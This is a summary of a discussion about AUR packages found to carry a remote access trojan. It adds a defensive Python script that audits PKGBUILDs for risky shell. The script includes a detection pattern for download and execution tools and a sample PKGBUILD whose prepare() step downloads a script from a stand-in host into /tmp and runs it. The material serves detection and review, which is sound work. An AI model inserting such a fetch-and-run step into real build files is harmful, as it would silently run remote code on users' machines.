Firefox-patch-bin, librewolf-fix-bin AUR packages contain malware

Incident and Impact

  • Three AUR packages — librewolf-fix-bin, firefox-patch-bin, zen-browser-patched-bin — were found to contain a remote access trojan (RAT) that gives full control of the machine to the attacker.
  • Packages existed only a few days before removal; they were new, not compromises of the popular librewolf-bin or zen-browser-bin.
  • Several comments argue that with a RAT there is no reliable cleanup: the only safe response is to assume total compromise, take machines offline, back up data, and fully reinstall.

Information Gap and Indicators of Compromise

  • Some participants criticize the advisory for not listing technical indicators (files, startup entries, etc.) that would help users check systems.
  • Others counter that Arch’s priority is rapid notification; a full malware analysis is unrealistic, and a RAT may leave few or no consistent traces, especially if payloads are dumped to /tmp and cleaned up or actions vary per host.

How the Attack Worked

  • The AUR PKGBUILDs pulled code from a GitHub repo; a Python script in that code then downloaded the binary payload (a sample of which was later uploaded to VirusTotal), so the malicious fetch happened in build steps rather than in the package's declared source list.
  • One package declared provides=('firefox'), so many existing packages that depend on firefox appeared as “dependents”, likely to increase visibility.
  • At least one Reddit post promoted the malicious zen-browser-patched-bin as a “great find”, suggesting deliberate social engineering.

AUR Trust Model and User Responsibility

  • Repeated emphasis that AUR is explicitly “untrusted user content”: anyone can upload, packages are not vetted, and users are expected to read PKGBUILDs before building.
  • Arch’s official package manager (pacman) does not interact with the AUR at all; third‑party “helpers” (yay, paru, etc.) simply automate cloning the AUR repo, running makepkg and installing the result, and usually show the PKGBUILD or its diff against the previous revision before building.
  • Disagreement over real‑world behavior: some claim most Arch users install from AUR “without a second thought”; others dispute this and view AUR use as inherently “at your own risk”.

Proposals for Better Safeguards

  • Suggestions: tools to print all URLs in PKGBUILDs, highlight diffs on update, or summarize new commits to make manual review easier. Helpers already do some of this; printing URLs is seen as a useful extra.
  • Proposals to integrate LLMs for malware review are widely rejected as impractical (high false positives, easy to game).
  • VirusTotal integration into pacman -U is proposed; pushback focuses on privacy, limited usefulness against new malware, high API load, and conflict with Arch’s ethos of minimalism and user control.
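As an added illustration of the "read the PKGBUILD before building" expectation above and of the proposed safeguard of printing every URL and highlighting what an update introduces, here is a small reviewer-side audit script. It is example code written for this summary, not code from Arch, the AUR, or any AUR helper. The two PKGBUILD texts inside it are constructed for the demonstration; the package name, GitHub repository and hosts in them are hypothetical, and the "risky shell" patterns are a heuristic prompt to read the lines, not a malware verdict.

```python
"""Audit an AUR PKGBUILD the way a reviewer would before running makepkg:
list every URL it reaches for, flag shell that fetches or executes things
outside the source=() array, and report what a new revision introduces.
Added example, not code from Arch, the AUR, or any helper. The two PKGBUILD
texts below are constructed; package, repo and host names are hypothetical."""
from __future__ import annotations
import re

URL_RE = re.compile(r"""https?://[^\s"'()]+""")

# Shell a reviewer wants highlighted in function bodies: downloads done
# outside source=(), payloads staged in /tmp, decoding, and interpreters
# run on fetched content. Heuristic: a prompt to read, not a verdict.
RISKY_RE = re.compile(
    r"\bcurl\b|\bwget\b|\bbase64\b|\beval\b|\bpython3?\b|/tmp/|"
    r"\bchmod\s+\+x|\bnohup\b|\bcrontab\b|systemctl\s+--user"
)


def extract_urls(pkgbuild: str) -> list[str]:
    """Every URL anywhere in the text, including inside prepare()/build()/
    package() bodies. .SRCINFO only reflects source=(), so a fetch hidden in
    a function never appears there; scanning the raw PKGBUILD catches it."""
    return sorted(set(URL_RE.findall(pkgbuild)))


def extract_provides(pkgbuild: str) -> list[str]:
    """Names the package claims to provide. A brand-new upload that provides
    a popular name (e.g. firefox) inherits that name's dependents, which is
    a visibility trick rather than a packaging need."""
    m = re.search(r"^provides=\((.*?)\)", pkgbuild, re.M | re.S)
    return [p.strip("'\"") for p in m.group(1).split()] if m else []


def risky_lines(pkgbuild: str) -> list[tuple[int, str]]:
    """(line number, line) pairs matching RISKY_RE, comment lines skipped."""
    hits = []
    for n, line in enumerate(pkgbuild.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue
        if RISKY_RE.search(stripped):
            hits.append((n, stripped))
    return hits


def new_urls(old: str, new: str) -> list[str]:
    """URLs in the updated revision that the previous revision never touched."""
    return sorted(set(extract_urls(new)) - set(extract_urls(old)))


def new_provides(old: str, new: str) -> list[str]:
    """provides= entries added by the update."""
    return sorted(set(extract_provides(new)) - set(extract_provides(old)))


def audit(old: str, new: str) -> dict:
    """Summary a helper could print on update, before asking whether to build."""
    return {
        "urls": extract_urls(new),
        "new_urls": new_urls(old, new),
        "new_provides": new_provides(old, new),
        "risky": risky_lines(new),
    }


# Constructed sample: a benign first revision of a hypothetical package.
OLD_PKGBUILD = """\
pkgname=example-browser-bin
pkgver=1.0
pkgrel=1
provides=('example-browser')
source=("https://example.org/releases/example-browser-1.0.tar.xz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

package() {
    install -Dm755 example-browser "$pkgdir/usr/bin/example-browser"
}
"""

# Constructed sample: an update that switches the source to a GitHub repo,
# claims to provide firefox, and fetches plus runs a script from prepare().
NEW_PKGBUILD = """\
pkgname=example-browser-bin
pkgver=1.1
pkgrel=1
provides=('example-browser' 'firefox')
source=("https://github.com/example-user/example-browser-patches/archive/refs/tags/v1.1.tar.gz")
sha256sums=('SKIP')

prepare() {
    # Fetched in a function body, so it never shows up in .SRCINFO.
    curl -sL https://example.net/helper.py -o /tmp/helper.py
    python3 /tmp/helper.py
}

package() {
    install -Dm755 example-browser "$pkgdir/usr/bin/example-browser"
}
"""

if __name__ == "__main__":
    for key, value in audit(OLD_PKGBUILD, NEW_PKGBUILD).items():
        print(f"{key}:")
        for item in value:
            print(f"  {item}")
```

On a real system the two inputs would be the PKGBUILD from the previous build and the one just cloned from aur.archlinux.org; the point of diffing URLs and provides= rather than the whole file is that a new download host or a newly claimed popular package name is exactly what gets lost in a long, noisy diff. Pattern matching like this is easy to evade, so it complements reading the file; it does not replace it.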

Broader Reflections

  • Several note that similar risks exist in other ecosystems (Fedora COPR, Plasma widget store, npm, etc.).
  • Some express nervousness and plan audits of third‑party repos; others frame the quick detection (within ~2 days) as evidence the AUR community is actively policing new uploads.